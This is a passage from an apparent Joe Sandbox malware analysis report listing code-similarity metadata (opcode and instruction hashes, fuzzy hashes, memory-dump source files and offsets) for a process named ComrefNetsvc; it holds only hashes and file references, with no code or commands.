                                                                                  • Instruction Fuzzy Hash: D811F635E1990D8FDFACDB58D4A5AACB7B1EF98314F0001BED15EE72A5CE7669408B00
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 460171d8ac546c5ec18f329c6421517618eb356139f41a344619bee9800e587f
                                                                                  • Instruction ID: a7beeca2c2b44eeb9a5620bd256df31fd38a30d9211b31b8e1b00ff52581cdf6
                                                                                  • Opcode Fuzzy Hash: 460171d8ac546c5ec18f329c6421517618eb356139f41a344619bee9800e587f
                                                                                  • Instruction Fuzzy Hash: 82114832B0AE4D4FE77095A444255BD37DAEF46301F060579E05ED71A2DD3A79058341
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ac468c31e733685d1df97849163e90363a531b37d8b95cf2dc2f375d813b8629
                                                                                  • Instruction ID: eef32bd091d598bfc5fbc6901c2f14c210ce5b509978029cce20b672ed25ca92
                                                                                  • Opcode Fuzzy Hash: ac468c31e733685d1df97849163e90363a531b37d8b95cf2dc2f375d813b8629
                                                                                  • Instruction Fuzzy Hash: D6010431B0AE0E9FE730A6F444691BE36EADF55340F05057ED41BDB2B1ED76AA058381
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1f419985bec255db2162833c262bb08affdf83b0c681ec1c1edad3f6116f2724
                                                                                  • Instruction ID: 6deeaa4f9b3e2e0343b571d18090837599d9090435718e97531a2907982819eb
                                                                                  • Opcode Fuzzy Hash: 1f419985bec255db2162833c262bb08affdf83b0c681ec1c1edad3f6116f2724
                                                                                  • Instruction Fuzzy Hash: 2111BF22A1EF8E4EDBA587A498600ED7BB1EF45300F0A00B7E059D71E2D92A2A058751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: c3cde7ffc7676e100aad871ddd4a8d19598b42ca843dfb59473a9161a0ef696a
                                                                                  • Instruction ID: 34a980e2344ea087ba6745db413c549f7e396618752fb407233741f0a6ba0584
                                                                                  • Opcode Fuzzy Hash: c3cde7ffc7676e100aad871ddd4a8d19598b42ca843dfb59473a9161a0ef696a
                                                                                  • Instruction Fuzzy Hash: AE112E30E08A0DCFDB68DF84C494FAD77B1EB58311F16017AD00EE72A5CA75A984CB40
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: ab194e4da0ef047becd37d40f4ee2ffa320ba046aa95b7ba630a2cdcbdb388ac
                                                                                  • Instruction ID: 94f9a74cd1f4b2e43b6a8a2bf2b6d4a6216263dd9f9c445170b98e6a28a8b012
                                                                                  • Opcode Fuzzy Hash: ab194e4da0ef047becd37d40f4ee2ffa320ba046aa95b7ba630a2cdcbdb388ac
                                                                                  • Instruction Fuzzy Hash: 3F01A11AF0FC5F86F57855E438391BC41486F80320F16257AD62F660E6DC2F2A412382
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: e7206814940d934a3592c8d536753e5fc6c63c0b2c8d4661d9036a0e83c3e04a
                                                                                  • Instruction ID: bd99497bb5eb191387c4a2c66605a42ca4b536f34f225858957a67df0151b404
                                                                                  • Opcode Fuzzy Hash: e7206814940d934a3592c8d536753e5fc6c63c0b2c8d4661d9036a0e83c3e04a
                                                                                  • Instruction Fuzzy Hash: E011C235A0D68D8FE722DBA8C8502DC7FB1EF42711F0645B7C088DB1A2D57416498794
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a20480248bab53707892c6d0fe8b773d4ac46ff004018d5f88033162b1ce6a8f
                                                                                  • Instruction ID: 1c0690a3d71f507c73523403bf3ca68de641f2a37d1d745c61b348a0437010dd
                                                                                  • Opcode Fuzzy Hash: a20480248bab53707892c6d0fe8b773d4ac46ff004018d5f88033162b1ce6a8f
                                                                                  • Instruction Fuzzy Hash: 2401AD35A0E68D8FE722DBA8C8A02DDBFB1EF42310F0645A7D084DB2A2D57466498790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: a42fe189578fcd3584e998c815a94aa2caba4f13b68e2bedeba41d7df529938f
                                                                                  • Instruction ID: 43b9de6fc347ddd727712553520a0c2fb4ef25876667d59295e45fe5dc9c84d6
                                                                                  • Opcode Fuzzy Hash: a42fe189578fcd3584e998c815a94aa2caba4f13b68e2bedeba41d7df529938f
                                                                                  • Instruction Fuzzy Hash: 04F04F30B19D0D5BD764EA98D0A1928B3E5FB88710B118279D02EC3296CE34BD0286C4
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 1ecbf1aaedf95708734c8a5ffb95730e4afde2a25225bf8da99d97cce9e560ed
                                                                                  • Instruction ID: 4846792c66704ce5d2dc630ad3c230fc2d596f612c436cb4d813260e4fc058c2
                                                                                  • Opcode Fuzzy Hash: 1ecbf1aaedf95708734c8a5ffb95730e4afde2a25225bf8da99d97cce9e560ed
                                                                                  • Instruction Fuzzy Hash: 7F017D3120DA4A8FC716CFB8D4F5AE577D0EF02310F1506BEDA16CB2E1C66AA650C781
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 70fba6de1ca5037ceaa73263a24d89d466cbd7bb292cf688b1073032d8cff78b
                                                                                  • Instruction ID: d9f1c891e0f4df4605888e865794ed83d29e797dabe40e658a3c55418215718a
                                                                                  • Opcode Fuzzy Hash: 70fba6de1ca5037ceaa73263a24d89d466cbd7bb292cf688b1073032d8cff78b
                                                                                  • Instruction Fuzzy Hash: 66017D3120DA4A8FC706CBB8C4E5AE577D4EF41320F1506BED656CB6D1CA695650C7C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: fc0a31a39a0a386294f667cf356c2f368cfbcbb856a85310e646d33e707f308c
                                                                                  • Instruction ID: 69e0f873bd6ef64445d4c34c0be1dc5edd140851ecd99cb959c8012929811361
                                                                                  • Opcode Fuzzy Hash: fc0a31a39a0a386294f667cf356c2f368cfbcbb856a85310e646d33e707f308c
                                                                                  • Instruction Fuzzy Hash: 0A019E31A0E38D9FD722DBA8C8902DCBFB1AF02314F1541E7D084DB2A2D5746645C790
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 3531f46b16ee2ba545d790a7c91620a5ee724ad676c4a6f628eba690344d6d47
                                                                                  • Instruction ID: d431cec1e4950beda15d94be8dcb3e3fc88c624038e34c50aa6d5ea6e2ccde8e
                                                                                  • Opcode Fuzzy Hash: 3531f46b16ee2ba545d790a7c91620a5ee724ad676c4a6f628eba690344d6d47
                                                                                  • Instruction Fuzzy Hash: A8F0C23588FAC99FD7228BB088655E53FE8AF43200B1500E6D4A58A0B2C93E56068351
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 60b544031e5de9911d54a949208d5ae1b8a9d53eb90dd1fce438f3530998795b
                                                                                  • Instruction ID: 610a8a42d4b13c3cc031ed9c6068b7bbbb75f068f5b8628f06bfd4c30761e6ac
                                                                                  • Opcode Fuzzy Hash: 60b544031e5de9911d54a949208d5ae1b8a9d53eb90dd1fce438f3530998795b
                                                                                  • Instruction Fuzzy Hash: 52F01221F2EC0F8EEBA89BD8A8611FD77A5FF48350F550575E02ED21E1DE3625025640
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2196129364.00007FFD9BE80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BE80000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9be80000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 8f134fad0f750b5a958660e4d04c99189fb1b62a9a558518aa2de741a403ae8d
                                                                                  • Instruction ID: a6596a483514d55de6d48134f7c0b50a35fc62467364bbd679107bc7ab6b0fcd
                                                                                  • Opcode Fuzzy Hash: 8f134fad0f750b5a958660e4d04c99189fb1b62a9a558518aa2de741a403ae8d
                                                                                  • Instruction Fuzzy Hash: B7F0623145EBC99FD7238BB08C225A57FB8EF52214B1901FAD459870A2C93E171AD751
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: 610aa049984872f08bf7c108adecbaaaf35d375c6d6ce19a0aa75deb8e9f0b95
                                                                                  • Instruction ID: 4833303f8d8529d936ace311f0dd61450373f0c6819815462c1d39b7c7693653
                                                                                  • Opcode Fuzzy Hash: 610aa049984872f08bf7c108adecbaaaf35d375c6d6ce19a0aa75deb8e9f0b95
                                                                                  • Instruction Fuzzy Hash: 2901A230A0E38D9FE721DBA4C8942DDBFB1EF06314F1541E7D484DB2A2D9785644C741
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000008.00000002.2187996476.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_8_2_7ffd9baa0000_ComrefNetsvc.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: